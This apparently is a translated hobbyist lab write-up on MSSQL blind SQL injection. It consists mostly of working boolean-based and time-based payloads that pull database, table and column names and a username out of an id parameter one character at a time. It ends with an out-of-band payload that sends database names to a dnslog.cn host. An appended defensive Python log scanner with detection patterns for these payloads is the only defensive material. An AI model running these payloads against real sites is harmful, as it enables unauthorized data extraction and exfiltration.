Lab environment (screenshots omitted): all database names; all table names in the oa database; the oa table Portal_Announcementscat.
Boolean-based blind injection:
Guessing the number of databases:
First check whether a given dbid exists:
# dbid values here are valid all the way up to 9
id=1 and 1=(select count(*) from master.dbo.sysdatabases where dbid=5)
This gives 9 databases in total.
Guess the database name length by dbid:
# the database name length here is 12
id=1 and 1=(select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)>4)
Query the database names one by one by dbid:
# the first character is R, ASCII code 82
id=1 and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) >81
# query the second character, and so on
id=1 and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) >100
Notes:
substring(str,start,len) extracts a substring: the first argument is the string to cut from, the second is the position to start at, the third is the number of characters to take.
ascii(char) converts a character to its ASCII value.
Guessing table name lengths:
# length of the first table name in the current database
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and len(name)>22)
# length of the second table name in the current database, and so on
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u' and name != 'Portal_Announcementscat') and len(name)=20)
# length of the first table name in another database, e.g. the database DianCMS obtained with the statements above
id=1 and 1=(select count(*) from DianCMS.dbo.sysobjects where name in (select top 1 name from DianCMS.dbo.sysobjects where xtype='u') and len(name)>1)
Guessing table names:
# guess the first character: P
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,1,1))=80)
# guess the second character: o, and so on
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,2,1))=111)
# the first table name is Portal_Announcementscat; now query the next table name. Taking the third table name as an example, its first character is u
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u' and name not in ('Portal_Announcementscat','Portal_Announcements')) and ascii(substring(name,1,1))=117)
Guessing column name lengths:
id=1 and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'Portal_Announcementscat') and len(name)=5)
id=1 and 1=(select count(*) from syscolumns where id = (select id from sysobjects where name = 'Portal_Announcementscat') and len(name)=5)
# guess the length of the next column name:
id=1 and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'Portal_Announcementscat') and name not in ('catid') and len(name)=8)
Guessing column names: (the first form of statement is recommended)
While testing the second payload I found a problem: the columns catid and moduleid both exist, and when one character is extracted and its ASCII value checked, both c (ASCII 99) and m (ASCII 109) return the "true" page. Keep this in mind when writing a blind injection script, or switch to a different payload; using exists is not recommended.
# guess the first character of the column name: c
id=1 and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat')),1,1)) =99
id=1 and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'Portal_Announcementscat') and unicode(substring(name,1,1))=99)
# guess the second character of the column name: a, and so on
id=1 and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat')),2,1)) =97
id=1 and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'Portal_Announcementscat') and unicode(substring(name,2,1))=97)
# guess the remaining column names in the same way:
id=1 and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat') and name not in ('catid')),1,1)) =109
Guessing data:
# check the first character of the opusername column: a
id=1 and ascii(substring((select top 1 opusername from Portal_Announcementscat),1,1)) = 97
# check the second character of the opusername column: d, and so on
id=1 and ascii(substring((select top 1 opusername from Portal_Announcementscat),2,1)) = 100
Time-based blind injection:
Example:
WAITFOR DELAY '0:0:4' -- delays for 4 seconds
IF exists () clause:
IF exists () WAITFOR DELAY '0:0:5'
Checking whether time-based blind injection is possible:
id=1 WAITFOR DELAY '0:0:5'--
Checking whether a database exists:
# increase dbid by 1 each time
id=1 if ((select count(*) from master.dbo.sysdatabases where dbid=5)=1) waitfor delay '0:0:3'--
Guess the database name length:
id=1 if ((select count(*) from master.dbo.sysdatabases where dbid=9 and len(name)=2)=1) waitfor delay '0:0:5'--
Guess the database name:
# guess the first character: o
id=1 if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=9),1,1)) = 111) WAITFOR DELAY '0:0:5'--
# guess the second character: a, and so on
id=1 if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=9),2,1)) = 97) WAITFOR DELAY '0:0:5'--
Guessing table name lengths:
# the database name obtained with the statements above: oa
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u') and len(name)=23)=1) WAITFOR DELAY '0:0:5'--
# length of the next table name, and so on:
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u' and name not in ('Portal_Announcementscat')) and len(name)=20)=1) WAITFOR DELAY '0:0:5'--
Guessing table names:
# guess the first character: P
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=80)=1) WAITFOR DELAY '0:0:5'--
# guess the second character: o, and so on
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=111)=1) WAITFOR DELAY '0:0:5'--
# guess the next table name:
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u' and name not in ('Portal_Announcementscat')) and ascii(substring(name,1,1))=80)=1) WAITFOR DELAY '0:0:5'--
Guessing column name lengths:
id=1 if(exists(select top 1 name from oa.dbo.syscolumns where id =(select id from oa.dbo.sysobjects where name = 'Portal_Announcementscat') and len(name)=5)) WAITFOR DELAY '0:0:5'--
id=1 if((select count(*) from oa.dbo.syscolumns where id =(select id from oa.dbo.sysobjects where name = 'Portal_Announcementscat') and len(name)=5)>0) WAITFOR DELAY '0:0:5'--
# guess the length of the next column name
id=1 if(exists(select top 1 name from oa.dbo.syscolumns where id =(select id from oa.dbo.sysobjects where name = 'Portal_Announcementscat') and name not in ('catid') and len(name)=8)) WAITFOR DELAY '0:0:5'--
For this column-name-length payload there may be several columns with the same length. The current idea is to first iterate over the different length values, write the results into a set, and then iterate over that set when guessing the column names.
Guessing column names:
# get the first character: c
id=1 if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat')),1,1)) =99) WAITFOR DELAY '0:0:5'--
# get the second character: a, and so on
id=1 if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat')),2,1)) =97) WAITFOR DELAY '0:0:5'--
# guess the next column name:
id=1 if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat') and name not in ('catid')),1,1)) =109) WAITFOR DELAY '0:0:5'--
Guessing data column by column:
# check the first character of the opusername column: a
id=1 if (ascii(substring((select top 1 opusername from Portal_Announcementscat),1,1)) = 97) WAITFOR DELAY '0:0:5'--
# check the second character of the opusername column: d, and so on
id=1 if (ascii(substring((select top 1 opusername from Portal_Announcementscat),2,1)) = 100) WAITFOR DELAY '0:0:5'--
OOB (out-of-band) injection:
Applies to all MSSQL versions
id=1 and exists(select * from fn_trace_gettable('\\'+(select top 1 name from master..sysdatabases where dbid>4)+'.6etys1.dnslog.cn\1.trc',default))
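As a defender-side addition (not part of the original post), the following Python scans constructed web-server log lines for the payload families shown above: catalog enumeration through sysdatabases/sysobjects/syscolumns, the ascii(substring()) character oracle, WAITFOR DELAY, and fn_trace_gettable. The signature list, the combined log format, the sample lines and the EXAMPLE-DNSLOG-HOST placeholder are assumptions of this example; decoding is repeated so a double-encoded payload is still matched.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns for the MSSQL payload families shown above (constructed for this example).
SIGNATURES = [
    ("mssql_time_blind", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("mssql_catalog_enum", re.compile(
        r"master\.(dbo)?\.sysdatabases|sysobjects\s+where\s+xtype\s*=\s*('u'|0x75)|\bsyscolumns\b", re.I)),
    ("mssql_char_oracle", re.compile(r"\b(ascii|unicode)\s*\(\s*substring\s*\(", re.I)),
    ("mssql_oob_trace", re.compile(r"\bfn_trace_gettable\s*\(", re.I)),
]

# Combined-log-format request line: client, method, path with query string, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def decode_query(raw, rounds=3):
    """URL-decode repeatedly (bounded) so a double-encoded payload is still seen."""
    text = raw
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(path):
    """Return the signature labels that match the decoded query string of a request path."""
    query = path.split("?", 1)[1] if "?" in path else ""
    return [label for label, rx in SIGNATURES if rx.search(decode_query(query))]

def scan_log(lines):
    """Return (client, path, labels) for every request that hits at least one signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, _status = m.groups()
        labels = classify(path)
        if labels:
            hits.append((client, path, labels))
    return hits

# Constructed sample lines; payloads mirror the ones above, DNS-log host replaced by EXAMPLE-DNSLOG-HOST.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2021:10:00:01 +0800] "GET /news.aspx?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2021:10:00:02 +0800] "GET /news.aspx?id=1%20and%20ascii(substring((select%20top%201%20name%20from%20master.dbo.sysdatabases%20where%20dbid=5),1,1))%20%3E81 HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2021:10:00:08 +0800] "GET /news.aspx?id=1%2520WAITFOR%2520DELAY%2520%270:0:5%27-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2021:10:00:09 +0800] "GET /news.aspx?id=1%20and%20exists(select%20*%20from%20fn_trace_gettable(%27%5C%5C%27%2B(select%20top%201%20name%20from%20master..sysdatabases%20where%20dbid%3E4)%2B%27.EXAMPLE-DNSLOG-HOST%5C1.trc%27,default)) HTTP/1.1" 500 0',
]
```

Run scan_log(SAMPLE_LOG) to list the three flagged requests with their labels; the unflagged first line shows a normal id=1 request passes through.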
Future plans:
If I have time I will write a blind injection script, although I suspect it won't be easy to write; I'm still quite a novice.